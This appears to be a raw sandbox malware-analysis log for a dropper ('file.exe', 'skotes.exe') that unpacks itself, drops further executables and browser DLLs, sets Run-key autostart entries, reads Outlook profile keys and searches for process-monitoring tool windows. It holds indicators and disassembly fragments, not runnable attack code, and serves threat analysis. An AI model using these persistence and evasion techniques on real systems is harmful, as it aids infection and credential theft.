Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.30.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.30.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.30.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.30.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.30.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.30.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: file.exe

Static file information: File size 3288064 > 1048576

Source: file.exe

Static PE information: Raw size of fknmyouv is bigger than: 0x100000 < 0x2b7000

Source:	Binary string: my_library.pdbU source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000B3C000.00000040.00000001.01000000.0000000C.sdmp, 7fb3e2a1d2.exe, 0000000E.00000003.2960979403.00000000051CB000.00000004.00001000.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3420827049.000000000880B000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: my_library.pdb source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000B3C000.00000040.00000001.01000000.0000000C.sdmp, 7fb3e2a1d2.exe, 0000000E.00000003.2960979403.00000000051CB000.00000004.00001000.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3420827049.000000000880B000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.8c0000.0.unpack :EW;.rsrc:W;.idata :W;fknmyouv:EW;oavxjruv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fknmyouv:EW;oavxjruv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W;fknmyouv:EW;oavxjruv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fknmyouv:EW;oavxjruv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W;fknmyouv:EW;oavxjruv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fknmyouv:EW;oavxjruv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Unpacked PE file: 14.2.7fb3e2a1d2.exe.b10000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fawplrfx:EW;jtmuhxjq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fawplrfx:EW;jtmuhxjq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Unpacked PE file: 36.2.fe40c3a9a8.exe.a40000.0.unpack :EW;.rsrc:W;.idata :W;lkuaxvtl:EW;phfhxxut:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.6.dr	Static PE information: real checksum: 0x2d9471 should be: 0x2d79da
Source: pisos23[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x12c9b0
Source: random[1].exe2.6.dr	Static PE information: real checksum: 0x2ad6c8 should be: 0x2b1ddc
Source: chrome.dll.14.dr	Static PE information: real checksum: 0x0 should be: 0xb0b18
Source: 7fb3e2a1d2.exe.6.dr	Static PE information: real checksum: 0x2120c1 should be: 0x214310
Source: pisos23.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x12c9b0
Source: file.exe	Static PE information: real checksum: 0x32a91f should be: 0x329de2
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x32a91f should be: 0x329de2
Source: random[1].exe0.6.dr	Static PE information: real checksum: 0x2120c1 should be: 0x214310
Source: fe40c3a9a8.exe.6.dr	Static PE information: real checksum: 0x2ad6c8 should be: 0x2b1ddc
Source: 3e169c0a7e.exe.6.dr	Static PE information: real checksum: 0x2d9471 should be: 0x2d79da

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: fknmyouv
Source: file.exe	Static PE information: section name: oavxjruv
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: fknmyouv
Source: skotes.exe.0.dr	Static PE information: section name: oavxjruv
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: pisos23.exe.6.dr	Static PE information: section name: .05cfg
Source: pisos23.exe.6.dr	Static PE information: section name: .ondat
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name: vorbeozz
Source: random[1].exe.6.dr	Static PE information: section name: fvzeyeui
Source: random[1].exe.6.dr	Static PE information: section name: .taggant
Source: 3e169c0a7e.exe.6.dr	Static PE information: section name:
Source: 3e169c0a7e.exe.6.dr	Static PE information: section name: .idata
Source: 3e169c0a7e.exe.6.dr	Static PE information: section name: vorbeozz
Source: 3e169c0a7e.exe.6.dr	Static PE information: section name: fvzeyeui
Source: 3e169c0a7e.exe.6.dr	Static PE information: section name: .taggant
Source: pisos23[1].exe.6.dr	Static PE information: section name: .05cfg
Source: pisos23[1].exe.6.dr	Static PE information: section name: .ondat
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: fawplrfx
Source: random[1].exe0.6.dr	Static PE information: section name: jtmuhxjq
Source: random[1].exe0.6.dr	Static PE information: section name: .taggant
Source: 7fb3e2a1d2.exe.6.dr	Static PE information: section name:
Source: 7fb3e2a1d2.exe.6.dr	Static PE information: section name: .rsrc
Source: 7fb3e2a1d2.exe.6.dr	Static PE information: section name: .idata
Source: 7fb3e2a1d2.exe.6.dr	Static PE information: section name:
Source: 7fb3e2a1d2.exe.6.dr	Static PE information: section name: fawplrfx
Source: 7fb3e2a1d2.exe.6.dr	Static PE information: section name: jtmuhxjq
Source: 7fb3e2a1d2.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe2.6.dr	Static PE information: section name:
Source: random[1].exe2.6.dr	Static PE information: section name: .idata
Source: random[1].exe2.6.dr	Static PE information: section name: lkuaxvtl
Source: random[1].exe2.6.dr	Static PE information: section name: phfhxxut
Source: random[1].exe2.6.dr	Static PE information: section name: .taggant
Source: fe40c3a9a8.exe.6.dr	Static PE information: section name:
Source: fe40c3a9a8.exe.6.dr	Static PE information: section name: .idata
Source: fe40c3a9a8.exe.6.dr	Static PE information: section name: lkuaxvtl
Source: fe40c3a9a8.exe.6.dr	Static PE information: section name: phfhxxut
Source: fe40c3a9a8.exe.6.dr	Static PE information: section name: .taggant
Source: msvcp140.dll.14.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.14.dr	Static PE information: section name: .didat
Source: nss3.dll.14.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.14.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.14.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.14.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.14.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.14.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.14.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.14.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008DD91C push ecx; ret	0_2_008DD92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D8101 push edi; mov dword ptr [esp], ecx	0_2_009D8537
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D8101 push 2E4F6120h; mov dword ptr [esp], esi	0_2_009D8547
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D8101 push eax; mov dword ptr [esp], 736AB6B8h	0_2_009D8577
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D8101 push ecx; mov dword ptr [esp], ebx	0_2_009D8633
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D8101 push 48FA6EBBh; mov dword ptr [esp], eax	0_2_009D8656
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D8101 push 4903A353h; mov dword ptr [esp], ebx	0_2_009D86E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D8101 push edx; mov dword ptr [esp], FFFFFFFFh	0_2_009D8715
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D8101 push 3D79C1A1h; mov dword ptr [esp], eax	0_2_009D878E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D8101 push 482E0914h; mov dword ptr [esp], edi	0_2_009D8798
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D8101 push ecx; mov dword ptr [esp], edx	0_2_009D87BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D8101 push 038253B4h; mov dword ptr [esp], eax	0_2_009D881F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008D1359 push es; ret	0_2_008D135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B3D91C push ecx; ret	2_2_00B3D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00B3D91C push ecx; ret	3_2_00B3D92F
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA28F1 push BE00B338h; iretd	7_2_00AA28F6
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B11954 push ecx; ret	7_2_00B11967
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB8A96 push esp; retf	7_2_00AB8A9F
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9AE90 pushfd ; ret	7_2_00A9AE94
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A6CE30 push eax; ret	7_2_00A6CF93
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A6CE30 push eax; ret	7_2_00A6CFF2
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A6CE30 push eax; ret	7_2_00A6D17C
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Code function: 9_3_00DA73EB pushfd ; retf	9_3_00DA73EC
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Code function: 9_3_00DA73EB pushfd ; retf	9_3_00DA73EC
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Code function: 9_3_00DA8C92 pushfd ; ret	9_3_00DA8C94
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Code function: 9_3_00DA8C92 pushfd ; ret	9_3_00DA8C94
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Code function: 9_3_00DA760B push ss; retf	9_3_00DA760C
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Code function: 9_3_00DA760B push ss; retf	9_3_00DA760C
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Code function: 9_3_00D76239 push esi; retf	9_3_00D7623C
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Code function: 9_3_00D7CAA1 push es; ret	9_3_00D7CB17
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Code function: 9_3_00D7CAA1 push es; ret	9_3_00D7CB17

Source: file.exe	Static PE information: section name: entropy: 7.114782188410658
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.114782188410658
Source: pisos23.exe.6.dr	Static PE information: section name: .text entropy: 7.091730845051783
Source: random[1].exe.6.dr	Static PE information: section name: entropy: 7.985775454316176
Source: 3e169c0a7e.exe.6.dr	Static PE information: section name: entropy: 7.985775454316176
Source: pisos23[1].exe.6.dr	Static PE information: section name: .text entropy: 7.091730845051783
Source: random[1].exe0.6.dr	Static PE information: section name: fawplrfx entropy: 7.953322295087707
Source: 7fb3e2a1d2.exe.6.dr	Static PE information: section name: fawplrfx entropy: 7.953322295087707
Source: random[1].exe2.6.dr	Static PE information: section name: entropy: 7.792455579939998
Source: fe40c3a9a8.exe.6.dr	Static PE information: section name: entropy: 7.792455579939998

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pisos23[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3e169c0a7e.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fe40c3a9a8.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7fb3e2a1d2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run da069a4b00.exe	Jump to behavior

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
